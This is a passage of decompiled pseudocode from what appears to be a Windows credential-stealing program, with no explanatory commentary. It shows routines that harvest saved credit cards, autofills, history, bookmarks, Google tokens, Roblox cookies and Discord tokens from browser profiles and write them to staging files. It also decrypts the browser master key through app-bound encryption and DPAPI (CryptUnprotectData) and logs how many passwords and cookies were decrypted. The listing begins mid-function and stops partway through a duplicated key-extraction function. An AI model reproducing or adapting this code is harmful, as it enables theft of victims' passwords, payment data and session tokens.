log("[#] %s/%s: %d cards found\n", Buffer, (const char *)lpMultiByteStr, v121[2]);
v104 = v121;
}
v132 = v104;
free(v156[0]);
v49 = v132;
if ( v111 )
goto LABEL_104;
}
else if ( v111 )
{
LABEL_104:
if ( v49[2] > 0 )
{
v139 = v4;
v50 = 0;
Buffer_4 = Buffer_2;
v51 = 0;
__imp__snwprintf_s_2 = __imp__snwprintf_s;
v52 = v49;
v135 = v14;
do
{
while ( 1 )
{
v56 = v111[2];
v57 = v111[3];
if ( v56 >= v57 )
{
v58 = 2 * v57;
v59 = realloc(*(void **)v111, 688LL * v57);
if ( v59 )
{
*(_QWORD *)v111 = v59;
v111[3] = v58;
}
else
{
v58 = v111[3];
}
v56 = v111[2];
if ( v56 >= v58 )
break;
}
v53 = *(_QWORD *)v52;
++v50;
v111[2] = v56 + 1;
v54 = (_QWORD *)(*(_QWORD *)v111 + 344LL * v56);
v55 = (char *)(v51 + v53);
v51 += 344;
*v54 = *(_QWORD *)v55;
v54[42] = *((_QWORD *)v55 + 42);
qmemcpy(
(void *)((unsigned __int64)(v54 + 1) & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)(v55 - ((char *)v54 - ((unsigned __int64)(v54 + 1) & 0xFFFFFFFFFFFFFFF8uLL))),
8LL * (((unsigned int)v54 - (((_DWORD)v54 + 8) & 0xFFFFFFF8) + 344) >> 3));
if ( v50 >= v52[2] )
goto LABEL_112;
}
++v50;
v51 += 344;
}
while ( v50 < v52[2] );
LABEL_112:
v49 = v52;
v14 = v135;
v4 = v139;
Buffer_2 = Buffer_4;
__imp__snwprintf_s = __imp__snwprintf_s_2;
}
v122 = v49;
free(*(void **)v49);
free(v122);
LABEL_18:
if ( (v2 & 8) != 0 )
{
v31 = (int *)((__int64 (__fastcall *)(void *, _QWORD))sub_14000A5C0)(v149, 0);
if ( v31 )
{
if ( v31[2] <= 0 )
{
sub_14000B4A0(v31);
}
else
{
v117 = v31;
v150 = nullptr;
v147 = 0;
v32 = ((__int64 (__fastcall *)(int *, void **, unsigned int *))sub_140011F30)(v31, &v150, &v147);
v33 = v117;
if ( v32 )
{
_snprintf_s(Buffer_.m128i_i8, 520, -1, "%s/%s/autofills.json", Buffer, lpMultiByteStr);
v105 = ((__int64 (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(
v177,
v150,
v147,
&Buffer_);
v106 = v117;
if ( v105 == 1 )
{
v14 = 1;
log("[#] %s/%s: %d autofills found\n", Buffer, (const char *)lpMultiByteStr, v117[2]);
v106 = v117;
}
v133 = v106;
free(v150);
v33 = v133;
}
v118 = v33;
v151 = nullptr;
v148 = 0;
v34 = ((__int64 (__fastcall *)(int *, void **, unsigned int *))sub_140012880)(v33, &v151, &v148);
v35 = v118;
if ( v34 )
{
((void (__fastcall *)(_QWORD, void **, void **))sub_14000BC80)(
*(_QWORD *)(*(_QWORD *)v176 + 8LL),
lpMultiByteStr,
v156);
_snprintf_s(Buffer_.m128i_i8, 520, -1, "Browser/Autofills/%s.txt", v156);
((void (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(v177, v151, v148, &Buffer_);
free(v151);
v35 = v118;
if ( v13 )
goto LABEL_90;
}
else if ( v13 )
{
LABEL_90:
if ( v35[2] > 0 )
{
v119 = v11;
v36 = v14;
v134 = v4;
v37 = 0;
Buffer_5 = Buffer_2;
v38 = 0;
__imp__snwprintf_s_3 = __imp__snwprintf_s;
v39 = v35;
do
{
while ( 1 )
{
v43 = v13[2];
v44 = v13[3];
if ( v43 >= v44 )
{
v45 = 2 * v44;
v46 = realloc(*(void **)v13, 8704LL * v44);
if ( v46 )
{
*(_QWORD *)v13 = v46;
v13[3] = v45;
}
else
{
v45 = v13[3];
}
v43 = v13[2];
if ( v43 >= v45 )
break;
}
v40 = *(_QWORD *)v39;
++v37;
v13[2] = v43 + 1;
v41 = (_QWORD *)(*(_QWORD *)v13 + 4352LL * v43);
v42 = (char *)(v38 + v40);
v38 += 4352;
*v41 = *(_QWORD *)v42;
v41[543] = *((_QWORD *)v42 + 543);
qmemcpy(
(void *)((unsigned __int64)(v41 + 1) & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)(v42 - ((char *)v41 - ((unsigned __int64)(v41 + 1) & 0xFFFFFFFFFFFFFFF8uLL))),
8LL * (((unsigned int)v41 - (((_DWORD)v41 + 8) & 0xFFFFFFF8) + 4352) >> 3));
if ( v37 >= v39[2] )
goto LABEL_98;
}
++v37;
v38 += 4352;
}
while ( v37 < v39[2] );
LABEL_98:
v14 = v36;
v35 = v39;
v11 = v119;
v4 = v134;
Buffer_2 = Buffer_5;
__imp__snwprintf_s = __imp__snwprintf_s_3;
}
v120 = v35;
free(*(void **)v35);
free(v120);
goto LABEL_19;
}
v13 = v35;
}
}
}
LABEL_19:
free(v149);
v149 = nullptr;
goto LABEL_20;
}
v111 = v49;
goto LABEL_18;
}
LABEL_20:
if ( (v2 & 0x10) != 0 )
{
__imp__snwprintf_s(Buffer_2, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\History", v4);
if ( (unsigned int)sub_140007F50(Buffer_2) )
{
v123 = ((__int64 (__fastcall *)(void *, _QWORD))sub_14000A710)(v149, 0);
free(v149);
v60 = (void *)v123;
v149 = nullptr;
if ( v123 )
{
if ( *(int *)(v123 + 8) > 0 )
{
v151 = nullptr;
LODWORD(v150) = 0;
v99 = ((__int64 (__fastcall *)(__int64, void **, void **))sub_1400129B0)(v123, &v151, &v150);
v60 = (void *)v123;
if ( v99 )
{
((void (__fastcall *)(_QWORD, void **, void **))sub_14000BC80)(
*(_QWORD *)(*(_QWORD *)v176 + 8LL),
lpMultiByteStr,
v156);
_snprintf_s(Buffer_.m128i_i8, 520, -1, "Browser/History/%s.txt", v156);
v100 = ((__int64 (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(
v177,
v151,
(unsigned int)v150,
&Buffer_);
v101 = v123;
if ( v100 == 1 )
{
v14 = 1;
log("[#] %s/%s: %d history entries\n", Buffer, (const char *)lpMultiByteStr, *(_DWORD *)(v123 + 8));
v101 = v123;
}
v130 = (void *)v101;
free(v151);
v60 = v130;
}
}
sub_14000B4E0(v60);
}
}
__imp__snwprintf_s(Buffer_2, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\Bookmarks", v4);
if ( (unsigned int)sub_140007F50(Buffer_2) )
{
v116 = (_DWORD *)sub_14000A920((char *)v149);
free(v149);
v30 = v116;
v149 = nullptr;
if ( v116 )
{
if ( (int)v116[2] > 0 )
{
v151 = nullptr;
LODWORD(v150) = 0;
v98 = ((__int64 (__fastcall *)(_DWORD *, void **, void **))sub_140012C30)(v116, &v151, &v150);
v30 = v116;
if ( v98 )
{
((void (__fastcall *)(_QWORD, void **, void **))sub_14000BC80)(
*(_QWORD *)(*(_QWORD *)v176 + 8LL),
lpMultiByteStr,
v156);
_snprintf_s(Buffer_.m128i_i8, 520, -1, "Browser/Bookmarks/%s.txt", v156);
if ( (unsigned int)((__int64 (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(
v177,
v151,
(unsigned int)v150,
&Buffer_) == 1 )
{
log("[#] %s/%s: %d bookmarks\n", Buffer, (const char *)lpMultiByteStr, v116[2]);
free(v151);
sub_14000B520(v116);
v109 = 1;
goto LABEL_22;
}
free(v151);
v30 = v116;
}
}
sub_14000B520(v30);
}
}
}
v109 |= v14;
LABEL_22:
v156[0] = nullptr;
LODWORD(v150) = 0;
__imp__snwprintf_s((wchar_t *const)&Buffer_, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\Web Data", v4);
if ( (unsigned int)sub_140007F50((LPCWCH)&Buffer_) )
{
v29 = (_DWORD *)((__int64 (__fastcall *)(void *, _QWORD, _OWORD *))sub_14000B010)(
v156[0],
(unsigned int)v150,
buf);
free(v156[0]);
if ( v29 )
{
if ( (int)v29[2] > 0 )
{
v158 = nullptr;
LODWORD(v151) = 0;
if ( (unsigned int)((__int64 (__fastcall *)(_DWORD *, wchar_t *, void **))sub_140012EC0)(v29, Buffer_2, &v151) )
{
_snprintf_s(Buffer_1, 260, -1, "%s/%s/google_tokens.json", Buffer, lpMultiByteStr);
((void (__fastcall *)(LPSTR, void *, _QWORD, _BYTE *))sub_140001480)(
v177,
v158,
(unsigned int)v151,
Buffer_1);
free(v158);
log("[#] %s/%s: %d Google tokens\n", Buffer, (const char *)lpMultiByteStr, v29[2]);
}
}
sub_14000B560(v29);
}
}
++v11;
v4 = (__m128i *)((char *)v4 + 648);
}
while ( v168 > v11 );
v108 = v13;
v6 = v176 + 4;
LABEL_25:
lpMultiByteStr[0] = nullptr;
LODWORD(v150) = 0;
__imp__snwprintf_s((wchar_t *const)&Buffer_, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, asc_14007977A, v6);
if ( (unsigned int)sub_140007F50((LPCWCH)&Buffer_) )
{
v64 = (_DWORD *)((__int64 (__fastcall *)(void *, _QWORD, _OWORD *))sub_14000A9B0)(
lpMultiByteStr[0],
(unsigned int)v150,
buf);
free(lpMultiByteStr[0]);
if ( v64 )
{
if ( (int)v64[2] > 0 )
{
v156[0] = nullptr;
LODWORD(v151) = 0;
if ( (unsigned int)((__int64 (__fastcall *)(_DWORD *, void **, void **))sub_140012EC0)(v64, v156, &v151) )
{
_snprintf_s((char *const)Buffer_2, 256, -1, "%s/Default/google_tokens_local_state.json", Buffer);
((void (__fastcall *)(LPSTR, void *, _QWORD, wchar_t *))sub_140001480)(
v177,
v156[0],
(unsigned int)v151,
Buffer_2);
free(v156[0]);
log("[#] %s: %d Google tokens from Local State\n", *(const char **)(*(_QWORD *)v176 + 8LL), v64[2]);
}
}
sub_14000B560(v64);
}
}
if ( !v110 )
goto LABEL_28;
if ( v110[2] <= 0 )
goto LABEL_28;
v22 = (int *)((__int64 (__fastcall *)(int *, _QWORD, _QWORD))sub_14000B620)(
v110,
*(_QWORD *)(*(_QWORD *)v176 + 8LL),
0);
v15 = v22;
if ( !v22 )
goto LABEL_28;
if ( v22[2] <= 0 )
{
sub_14000B5C0(v22);
LABEL_28:
v15 = nullptr;
goto LABEL_29;
}
v158 = nullptr;
LODWORD(v156[0]) = 0;
if ( (unsigned int)((__int64 (__fastcall *)(int *, wchar_t *, void **))sub_140013160)(v22, Buffer_2, v156) )
{
_snprintf_s(Buffer_.m128i_i8, 256, -1, "Soft/Roblox/%s_cookies.txt", *(_QWORD *)(*(_QWORD *)v176 + 8LL));
((void (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(v177, v158, LODWORD(v156[0]), &Buffer_);
free(v158);
log("[#] %s: %d Roblox tokens from cookies\n", *(const char **)(*(_QWORD *)v176 + 8LL), v15[2]);
}
LABEL_29:
((void (__fastcall *)(wchar_t *))sub_140014780)(Buffer_2);
if ( (unsigned int)((__int64 (__fastcall *)(const WCHAR *, wchar_t *))sub_140015350)(v6, Buffer_2) && v159 > 0 )
{
_snprintf_s(Buffer_.m128i_i8, 256, -1, "Soft/Discord/%s_tokens.txt", *(_QWORD *)(*(_QWORD *)v176 + 8LL));
((void (__fastcall *)(LPSTR, wchar_t *, __m128i *))sub_140015660)(v177, Buffer_2, &Buffer_);
log("[#] %s: %d Discord tokens from browser LevelDB\n", *(const char **)(*(_QWORD *)v176 + 8LL), v159);
}
((void (__fastcall *)(wchar_t *))sub_1400152E0)(Buffer_2);
if ( v112 )
Destination[16] = v112[2];
if ( v111 )
Destination[18] = v111[2];
v16 = v169[6426];
if ( !v110 )
{
if ( v108 )
{
Destination[19] = v108[2];
if ( v16 <= 0 )
{
if ( !v112 )
{
if ( v111 )
goto LABEL_214;
goto LABEL_45;
}
sub_14000B3A0(v112);
if ( !v111 )
goto LABEL_45;
LABEL_43:
sub_14000B440(v111);
LABEL_44:
if ( v108 )
goto LABEL_45;
goto LABEL_46;
}
goto LABEL_69;
}
if ( v169[6426] <= 0 )
{
if ( v112 )
{
sub_14000B3A0(v112);
goto LABEL_42;
}
if ( !v111 )
goto LABEL_46;
goto LABEL_200;
}
LABEL_69:
v23 = sub_140027430(&Buffer_, 0x8000, "\n=== %s Decryption Log ===\n", *(const char **)(*(_QWORD *)v176 + 8LL));
if ( v169[6426] > 0 )
{
v24 = (const char *)&v169[26];
n100 = 0;
do
{
v26 = v24;
++n100;
v24 += 256;
v23 += sub_140027430(&Buffer_.m128i_i8[v23], 0x8000LL - v23, "%s\n", v26);
}
while ( v169[6426] > n100 && n100 != 100 );
}
v27 = v23
+ sub_140027430(
&Buffer_.m128i_i8[v23],
0x8000LL - v23,
"\nPasswords: v10=%d, v20=%d, dpapi=%d, failed=%d\n",
v169[17],
v169[18],
v169[19],
v169[20]);
v28 = sub_140027430(
&Buffer_.m128i_i8[v27],
0x8000LL - v27,
"Cookies: v10=%d, v20=%d, dpapi=%d, failed=%d\n",
v169[22],
v169[23],
v169[24],
v169[25])
+ v27;
_snprintf_s(Buffer_1, 260, -1, "%s/decrypt_log.txt", Buffer);
((void (__fastcall *)(LPSTR, __m128i *, _QWORD, _BYTE *))sub_140001480)(v177, &Buffer_, v28, Buffer_1);
Destination[21] = 1;
memcpy(Destination + 22, v169, 0x646Cu);
if ( v112 )
sub_14000B3A0(v112);
if ( v110 )
LABEL_41:
sub_14000B400(v110);
LABEL_42:
if ( !v111 )
goto LABEL_44;
goto LABEL_43;
}
Destination[17] = v110[2];
if ( !v108 )
{
if ( v16 <= 0 )
{
if ( !v112 )
{
sub_14000B400(v110);
v102 = v111;
if ( !v111 )
goto LABEL_46;
LABEL_201:
sub_14000B440(v102);
goto LABEL_46;
}
sub_14000B3A0(v112);
sub_14000B400(v110);
if ( !v111 )
goto LABEL_46;
LABEL_200:
v102 = v111;
goto LABEL_201;
}
goto LABEL_69;
}
Destination[19] = v108[2];
if ( v16 > 0 )
goto LABEL_69;
if ( v112 )
{
sub_14000B3A0(v112);
goto LABEL_41;
}
sub_14000B400(v110);
if ( v111 )
LABEL_214:
sub_14000B440(v111);
LABEL_45:
sub_14000B4A0(v108);
LABEL_46:
if ( v15 )
sub_14000B5C0(v15);
memset(buf, 0, sizeof(buf));
memset(buf_2, 0, sizeof(buf_2));
return v109;
}
// positive sp value has been detected, the output may be wrong!
__int64 abe_extract_master_key()
{
_QWORD *v0; // rdx
__m128i *v1; // rbx
__int64 v2; // rcx
unsigned int v3; // ebp
void *v4; // rdi
int v5; // r12d
const char *ABE; // rdx
int v7; // eax
DWORD n4; // esi
int n63; // eax
unsigned int n8_1; // edx
__int8 *v11; // rax
int n63_1; // edx
int n63_2; // ecx
unsigned int n8; // edx
__int64 v16; // rdx
__int64 v17; // r8
unsigned int n8_3; // edx
__int8 *v19; // rax
BYTE *pbData; // rdx
DWORD n8_2; // r12d
BYTE *v22; // rsi
__int8 *v23; // rax
size_t n50_2; // rax
__m128i *pcbBinary; // r9
char *pszString_1; // rcx
unsigned __int64 n50_1; // rdx
__int64 n50; // rax
__int64 n2; // r8
__int64 v30; // rcx
__int64 v31; // r8
__m128i v32; // xmm2
__m128i v33; // xmm3
__int8 *v34; // rcx
__m128i v35; // xmm4
__m128i v36; // xmm5
__int64 v37; // [rsp+20h] [rbp-2298h]
__int64 v38; // [rsp+28h] [rbp-2290h]
__int64 v39; // [rsp+30h] [rbp-2288h]
int v40; // [rsp+50h] [rbp-2268h] BYREF
unsigned int n512; // [rsp+54h] [rbp-2264h] BYREF
void *v42; // [rsp+58h] [rbp-2260h] BYREF
DATA_BLOB pDataIn_; // [rsp+60h] [rbp-2258h] BYREF
DATA_BLOB pDataOut_; // [rsp+70h] [rbp-2248h] BYREF
__m128i pcbBinary_; // [rsp+80h] [rbp-2238h] BYREF
__m128i v46[31]; // [rsp+90h] [rbp-2228h] BYREF
char pszString[4096]; // [rsp+280h] [rbp-2038h] BYREF
int pbBinary_; // [rsp+1280h] [rbp-1038h] BYREF
_QWORD v49[516]; // [rsp+1284h] [rbp-1034h] BYREF
sub_140027320();
v1 = (__m128i *)v0;
v40 = 0;
v42 = nullptr;
*v0 = 0;
*(_QWORD *)((char *)v0 + 4132) = 0;
memset(
(void *)((unsigned __int64)(v0 + 1) & 0xFFFFFFFFFFFFFFF8uLL),
0,
8LL * (((unsigned int)v0 - (((_DWORD)v0 + 8) & 0xFFFFFFF8) + 4140) >> 3));
v3 = ((__int64 (__fastcall *)(__int64, void **, int *))sub_14000EDA0)(v2, &v42, &v40);
if ( !v3 )
{
log("[-] Cannot read Local State file\n");
return 0;
}
log("[#] Local State size: %lu bytes\n", v40);
v4 = v42;
v5 = ((__int64 (__fastcall *)(void *, char *, __int64))sub_14000EEE0)(v42, pszString, 4096);
if ( v5 )
{
log("[#] Found app_bound_encrypted_key\n");
free(v4);
ABE = "ABE";
}
else
{
if ( !(unsigned int)((__int64 (__fastcall *)(void *, char *, __int64))sub_14000EF60)(v4, pszString, 4096) )
{
log("[-] No encryption keys found in Local State\n");
free(v4);
return 0;
}
log("[#] Found encrypted_key (old format)\n");
free(v4);
ABE = "DPAPI";
}
log("[#] Key source: %s\n", ABE);
v7 = strlen(pszString);
log("[#] Base64 length: %d\n", v7);
pcbBinary_.m128i_i32[0] = 4096;
if ( !CryptStringToBinaryA(pszString, 0, 1u, (BYTE *)&pbBinary_, (DWORD *)&pcbBinary_, nullptr, nullptr) )
{
n50_2 = strlen(pszString);
pcbBinary = &pcbBinary_;
pszString_1 = pszString;
n50_1 = n50_2;
n50 = 50;
if ( n50_1 <= 0x32 )
n50 = n50_1;
if ( (unsigned int)n50 >= 8 )
{
LODWORD(v30) = 0;
do
{
v31 = (unsigned int)v30;
v30 = (unsigned int)(v30 + 8);
*(__int64 *)((char *)pcbBinary_.m128i_i64 + v31) = *(_QWORD *)&pszString[v31];
}
while ( (unsigned int)v30 < ((unsigned int)n50 & 0xFFFFFFF8) );
pcbBinary = (__m128i *)((char *)&pcbBinary_ + v30);
pszString_1 = &pszString[v30];
}
n2 = 0;
if ( (n50 & 4) != 0 )
{
pcbBinary->m128i_i32[0] = *(_DWORD *)pszString_1;
n2 = 2;
}
if ( (n50 & 2) != 0 )
{
pcbBinary->m128i_i16[n2] = *(_WORD *)&pszString_1[n2 * 2];
++n2;
}
if ( (n50 & 1) != 0 )
pcbBinary->m128i_i8[n2 * 2] = pszString_1[n2 * 2];
pcbBinary_.m128i_i8[n50] = 0;
log("[-] Base64 decode failed (len=%d, preview: %.50s...)\n", n50_1, pcbBinary_.m128i_i8);
return 0;
}
n4 = pcbBinary_.m128i_i32[0];
n63 = LOBYTE(v49[0]);
if ( pcbBinary_.m128i_i32[0] > 4u )
goto LABEL_27;
if ( pcbBinary_.m128i_i32[0] == 4 )
{
n63 = 63;
LABEL_27:
n63_1 = HIBYTE(pbBinary_);
LABEL_28:
n63_2 = BYTE2(pbBinary_);
goto LABEL_29;
}
if ( pcbBinary_.m128i_i32[0] == 3 )
{
n63_1 = 63;
n63 = 63;
goto LABEL_28;
}
if ( pcbBinary_.m128i_i32[0] != 2 )
{
LODWORD(v39) = 63;
LODWORD(v38) = 63;
if ( pcbBinary_.m128i_i32[0] )
{
n4 = 1;
LODWORD(v37) = 63;
log("[#] Decoded size: %lu bytes, prefix: %c%c%c%c%c\n", 1, (unsigned __int8)pbBinary_, 63, v37, v38, v39);
}
else
{
LODWORD(v37) = 63;
log("[#] Decoded size: %lu bytes, prefix: %c%c%c%c%c\n", 0, 63, 63, v37, v38, v39);
}
goto LABEL_12;
}
n63_2 = 63;
n63_1 = 63;
n63 = 63;
LABEL_29:
LODWORD(v38) = n63_1;
LODWORD(v37) = n63_2;
LODWORD(v39) = n63;
log(
"[#] Decoded size: %lu bytes, prefix: %c%c%c%c%c\n",
pcbBinary_.m128i_i32[0],
(unsigned __int8)pbBinary_,
BYTE1(pbBinary_),
v37,
v38,
v39);
if ( n4 <= 4 )
goto LABEL_12;
if ( pbBinary_ == 1112559681 )
{
n8 = n4 - 4;
if ( n4 - 4 <= 0x1000 )
{
v34 = &v1[2].m128i_i8[8];
v1[2].m128i_i64[0] = 0x100000000LL;
if ( n8 >= 8 )
{
v1[2].m128i_i64[1] = v49[0];
*(_QWORD *)&v34[n8 - 8] = *(_QWORD *)&pszString[n8 + 4092];
qmemcpy(
(void *)((unsigned __int64)&v1[3] & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)((char *)v49 - &v34[-((unsigned __int64)&v1[3] & 0xFFFFFFFFFFFFFFF8uLL)]),
8LL * ((n8 + (_DWORD)v34 - (((_DWORD)v1 + 48) & 0xFFFFFFF8)) >> 3));
}
else if ( (n8 & 4) != 0 )
{
v1[2].m128i_i32[2] = v49[0];
*(_DWORD *)&v34[n8 - 4] = *(int *)((char *)&pbBinary_ + n8);
}
else
{
v1[2].m128i_i8[8] = v49[0];
if ( (n8 & 2) != 0 )
*(_WORD *)&v34[n8 - 2] = *(_WORD *)((char *)&pbBinary_ + n8 + 2);
}
v1[258].m128i_i32[2] = n8;
log("[#] ABE key stored, size: %lu bytes\n", n8);
return v3;
}
log("[-] ABE key too large: %lu > %d\n", n8, 4096);
}
else if ( n4 == 5 )
{
goto LABEL_12;
}
if ( pbBinary_ != 1346457668
|| LOBYTE(v49[0]) != 73
|| (log("[#] DPAPI prefix found, decrypting...\n"),
n512 = 512,
!(unsigned int)((__int64 (__fastcall *)(char *, _QWORD, __m128i *))sub_14000ECA0)(
(char *)v49 + 1,
n4 - 5,
&pcbBinary_))
|| n512 <= 4 )
{
LABEL_12:
log("[#] Trying direct DPAPI...\n");
n512 = 512;
if ( (unsigned int)((__int64 (__fastcall *)(int *, _QWORD, __m128i *, unsigned int *))sub_14000ECA0)(
&pbBinary_,
n4,
&pcbBinary_,
&n512)
&& n512 > 4 )
{
if ( pcbBinary_.m128i_i32[0] == 1112559681 )
{
n8_1 = n512 - 4;
if ( n512 - 4 <= 0x1000 )
{
v1[2].m128i_i64[0] = 0x100000000LL;
v11 = &v1[2].m128i_i8[8];
if ( n8_1 >= 8 )
{
v1[2].m128i_i64[1] = *(__int64 *)((char *)pcbBinary_.m128i_i64 + 4);
*(_QWORD *)&v11[n8_1 - 8] = *(BYTE **)((char *)&pDataOut_.pbData + n8_1 + 4);
qmemcpy(
(void *)((unsigned __int64)&v1[3] & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)((char *)pcbBinary_.m128i_i64 + 4 - &v11[-((unsigned __int64)&v1[3] & 0xFFFFFFFFFFFFFFF8uLL)]),
8LL * ((n8_1 + (_DWORD)v11 - (((_DWORD)v1 + 48) & 0xFFFFFFF8)) >> 3));
}
else if ( (n8_1 & 4) != 0 )
{
v1[2].m128i_i32[2] = pcbBinary_.m128i_i32[1];
*(_DWORD *)&v11[n8_1 - 4] = *(__int32 *)((char *)pcbBinary_.m128i_i32 + n8_1);
}
else if ( n8_1 )
{
v1[2].m128i_i8[8] = pcbBinary_.m128i_i8[4];
if ( (n8_1 & 2) != 0 )
*(_WORD *)&v11[n8_1 - 2] = *(__int16 *)((char *)&pcbBinary_.m128i_i16[1] + n8_1);
}
v1[258].m128i_i32[2] = n8_1;
log("[#] Direct DPAPI->ABE key stored, size: %lu\n", n8_1);
return v3;
}
}
else if ( n512 == 32 )
{
v32 = _mm_loadu_si128(&pcbBinary_);
v1[2].m128i_i64[0] = 1;
v33 = _mm_loadu_si128(v46);
*v1 = v32;
v1[1] = v33;
log("[#] Direct DPAPI decrypted (32 bytes)\n");
return v3;
}
}
if ( v5 )
goto LABEL_57;
log("[#] Trying raw DPAPI for old format...\n");
pDataIn_.cbData = n4;
pDataIn_.pbData = (BYTE *)&pbBinary_;
if ( !CryptUnprotectData(&pDataIn_, nullptr, nullptr, nullptr, nullptr, 5u, &pDataOut_)
&& !CryptUnprotectData(&pDataIn_, nullptr, nullptr, nullptr, nullptr, 1u, &pDataOut_) )
{
goto LABEL_57;
}
pbData = pDataOut_.pbData;
if ( pDataOut_.cbData > 4 )
{
if ( *(_DWORD *)pDataOut_.pbData == 1112559681 )
{
n8_2 = pDataOut_.cbData - 4;
if ( pDataOut_.cbData - 4 <= 0x1000 )
{
v22 = pDataOut_.pbData + 4;
v1[2].m128i_i64[0] = 0x100000000LL;
v23 = &v1[2].m128i_i8[8];
if ( n8_2 >= 8 )
{
v1[2].m128i_i64[1] = *(_QWORD *)(pbData + 4);
*(_QWORD *)&v23[n8_2 - 8] = *(_QWORD *)&v22[n8_2 - 8];
qmemcpy(
(void *)((unsigned __int64)&v1[3] & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)(v22 - (BYTE *)&v23[-((unsigned __int64)&v1[3] & 0xFFFFFFFFFFFFFFF8uLL)]),
8LL * ((n8_2 + (_DWORD)v23 - (((_DWORD)v1 + 48) & 0xFFFFFFF8)) >> 3));
}
else if ( (n8_2 & 4) != 0 )
{
v1[2].m128i_i32[2] = *((_DWORD *)pbData + 1);
*(_DWORD *)&v23[n8_2 - 4] = *(_DWORD *)&pbData[n8_2];
}
else if ( n8_2 )
{
v1[2].m128i_i8[8] = pbData[4];
if ( (n8_2 & 2) != 0 )
*(_WORD *)&v23[n8_2 - 2] = *(_WORD *)&v22[n8_2 - 2];
}
v1[258].m128i_i32[2] = n8_2;
LocalFree(pbData);
log("[#] Raw DPAPI->ABE key stored, size: %lu\n", n8_2);
return v3;
}
}
else if ( pDataOut_.cbData == 32 )
{
v1[2].m128i_i64[0] = 1;
*v1 = _mm_loadu_si128((const __m128i *)pbData);
v1[1] = _mm_loadu_si128((const __m128i *)pbData + 1);
LocalFree(pbData);
log("[#] Raw DPAPI decrypted (32 bytes)\n");
return v3;
}
}
LocalFree(pDataOut_.pbData);
LABEL_57:
log("[-] All decryption methods failed\n");
return 0;
}
if ( pcbBinary_.m128i_i32[0] != 1112559681 )
{
if ( n512 == 32 )
{
v35 = _mm_loadu_si128(&pcbBinary_);
v1[2].m128i_i64[0] = 1;
v36 = _mm_loadu_si128(v46);
*v1 = v35;
v1[1] = v36;
log("[#] DPAPI key decrypted (32 bytes)\n", v16, v17, &n512);
return v3;
}
goto LABEL_12;
}
n8_3 = n512 - 4;
if ( n512 - 4 > 0x1000 )
goto LABEL_12;
v1[2].m128i_i64[0] = 0x100000000LL;
v19 = &v1[2].m128i_i8[8];
if ( n8_3 >= 8 )
{
v1[2].m128i_i64[1] = *(__int64 *)((char *)pcbBinary_.m128i_i64 + 4);
*(_QWORD *)&v19[n8_3 - 8] = *(BYTE **)((char *)&pDataOut_.pbData + n8_3 + 4);
qmemcpy(
(void *)((unsigned __int64)&v1[3] & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)((char *)pcbBinary_.m128i_i64 + 4 - &v19[-((unsigned __int64)&v1[3] & 0xFFFFFFFFFFFFFFF8uLL)]),
8LL * (((_DWORD)v19 - (((_DWORD)v1 + 48) & 0xFFFFFFF8) + n8_3) >> 3));
}
else if ( (n8_3 & 4) != 0 )
{
v1[2].m128i_i32[2] = pcbBinary_.m128i_i32[1];
*(_DWORD *)&v19[n8_3 - 4] = *(__int32 *)((char *)pcbBinary_.m128i_i32 + n8_3);
}
else if ( n8_3 )
{
v1[2].m128i_i8[8] = pcbBinary_.m128i_i8[4];
if ( (n8_3 & 2) != 0 )
*(_WORD *)&v19[n8_3 - 2] = *(__int16 *)((char *)&pcbBinary_.m128i_i16[1] + n8_3);
}
v1[258].m128i_i32[2] = n8_3;
log("[#] DPAPI->ABE key stored, size: %lu\n", n8_3);
return v3;
}
// positive sp value has been detected, the output may be wrong!
__int64 __fastcall abe_extract_master_key(double X)
{
_QWORD *v1; // rdx
__m128i *v2; // rbx
__int64 v3; // rcx
unsigned int v4; // ebp
double X_1; // xmm0_8
void *v6; // rdi
int v7; // r12d
double X_2; // xmm0_8
double X_3; // xmm0_8
double X_4; // xmm0_8
DWORD n5; // esi
int n63; // eax
unsigned int n8; // edx
__int8 *v14; // rax
int n63_1; // edx
int n63_5; // ecx
BYTE *pbData; // rdx
DWORD n8_1; // r12d
BYTE *v20; // rsi
__int8 *v21; // rax
size_t n50_2; // rax
__m128i *pcbBinary; // r9
char *pszString_1; // rcx
unsigned __int64 n50_1; // rdx
__int64 n50; // rax
__int64 n2; // r8
__int64 v28; // rcx
__int64 v29; // r8
__m128i v30; // xmm2
__m128i v31; // xmm3
__m128i v32; // xmm0
__int8 *v33; // rcx
__m128i v34; // xmm4
__m128i v35; // xmm5
int n63_4; // [rsp+20h] [rbp-2298h]
int n63_3; // [rsp+28h] [rbp-2290h]
int n63_2; // [rsp+30h] [rbp-2288h]
int v39; // [rsp+50h] [rbp-2268h] BYREF
unsigned int n512; // [rsp+54h] [rbp-2264h] BYREF
void *v41; // [rsp+58h] [rbp-2260h] BYREF
DATA_BLOB pDataIn_; // [rsp+60h] [rbp-2258h] BYREF
DATA_BLOB pDataOut_; // [rsp+70h] [rbp-2248h] BYREF
__m128i pcbBinary_; // [rsp+80h] [rbp-2238h] BYREF
__m128i v45[31]; // [rsp+90h] [rbp-2228h] BYREF
char pszString[4096]; // [rsp+280h] [rbp-2038h] BYREF
int pbBinary_; // [rsp+1280h] [rbp-1038h] BYREF
_QWORD v48[516]; // [rsp+1284h] [rbp-1034h] BYREF
sub_140027320();
v2 = (__m128i *)v1;
v39 = 0;
v41 = nullptr;
*v1 = 0;
*(_QWORD *)((char *)v1 + 4132) = 0;
memset(
(void *)((unsigned __int64)(v1 + 1) & 0xFFFFFFFFFFFFFFF8uLL),
0,
8LL * (((unsigned int)v1 - (((_DWORD)v1 + 8) & 0xFFFFFFF8) + 4140) >> 3));
v4 = ((__int64 (__fastcall *)(__int64, void **, int *))sub_14000EDA0)(v3, &v41, &v39);
if ( !v4 )
goto LABEL_23;
X_1 = log(X);
v6 = v41;
